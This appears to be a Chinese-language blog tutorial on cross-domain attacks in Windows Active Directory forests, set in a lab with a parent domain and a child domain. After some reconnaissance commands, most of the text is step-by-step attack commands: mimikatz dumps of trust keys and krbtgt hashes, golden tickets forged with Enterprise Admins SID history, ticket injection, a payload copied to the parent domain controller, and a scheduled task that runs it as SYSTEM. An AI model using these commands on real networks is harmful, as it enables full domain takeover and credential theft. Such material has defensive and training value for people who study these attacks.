跨域攻击的方法介绍

跨域攻击的方法介绍

一、内网中的域林

很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根据不同职能区分的部门,从逻辑上以主域和子域进行区分,以方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。

二、跨域攻击方法

1、常规渗透方法(利用web漏洞)

2、哈希传递票据攻击

3、利用域信任关系

三、获取域信息

在域中,Enterprise Admins组(出现在林中的根域中)的成员具有对目录林中所有域的完全控制权限。在默认情况下,该组包含林中所有域控制器上具有Administrators权限的成员。

1、查看当前域中计算机的权限

whoami /all

2、查看域信任关系

nltest /domain_trusts

3、使用LG工具获取域信息

(1)获取当前域中的用户组

LG.exe 域名\.

(2)获取远程机器的本地用户组

LG.exe \\计算机名 -lu

(3)获取远程系统中的用户SID

LG.exe \\计算机名 -lu -sidsout

四、利用域信任密钥跨域

1、实验环境

IP地址 所属域 域中地位 机器名 当前登录用户
192.168.142.10 candada.com candada的域控 DC1 candada\administrator
192.168.142.20 test.candada.com test子域的域控 DC2 test\administrator
192.168.142.32 test.candada.com test子域的机器 win10-2 test\can

已经控制住DC2和win10-2,目标是进一步控制DC1。

2、实验步骤

(1)使用mimikatz获取当前域的SID、父域的SID、子域域管的NTLM信任密钥。

mimikatz lsadump::trust /patch
mimikatz lsadump::lsa /patch /user:candada$

(2)在普通的域内用户中创建创建高权限票据

mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi
mimikatz kerberos::golden /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /rc4:85ebc8bf10bf4e04c20f4b3ce0a553af /user:administrator /service:krbtgt /target:candada.com /ticket:administrator.kirbi

(3)上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据

创建CIFS服务的票据和host服务票据

shell asktgs.exe administrator.kirbi cifs/DC1.candada.com
shell asktgs.exe administrator.kirbi host/DC1.candada.com

将票据注入内存

shell kirbikator.exe lsa cifs.DC1.candada.com.kirbi

复制文件的操作

shell copy can1.exe \\dc1.candada.com\c$
shell dir \\dc1.candada.com\c$

(4)进行创建计划任务

shell schtasks /create /s dc1.candada.com /tn test /sc onstart /tr c:\can1.exe /ru system /f

(5)执行计划任务

schtasks /run /s dc1.candada.com /i /tn "test"

(6)删除计划任务

shell schtasks /delete /s dc1.candada.com /tn "test" /f

五、利用krbtgt哈希值跨域

1、实验环境

IP地址 所属域 域中地位 机器名 当前登录用户
192.168.142.10 candada.com candada的域控 DC1 candada\administrator
192.168.142.20 test.candada.com test子域的域控 DC2 test\administrator
192.168.142.32 test.candada.com test子域的机器 win10-2 test\can

已经控制住DC2和win10-2,目标是进一步控制DC1。

2、实验步骤

(1)获取Krbtgt散列

mimikatz lsadump::lsa /patch /user:krbtgt

(2)获取当前域的SID、父域的SID

mimikatz lsadump::trust /patch

(3)构造并注入黄金票据

Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列 /ptt
mimikatz Kerberos::golden /user:administrator /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /krbtgt:dd30df5d4360179f04471b39ed515274 /ptt

(4)后续可利用计划任务或者服务进行上线

热门相关:恭喜你被逮捕了   花月颂   锦乡里   锦乡里   道君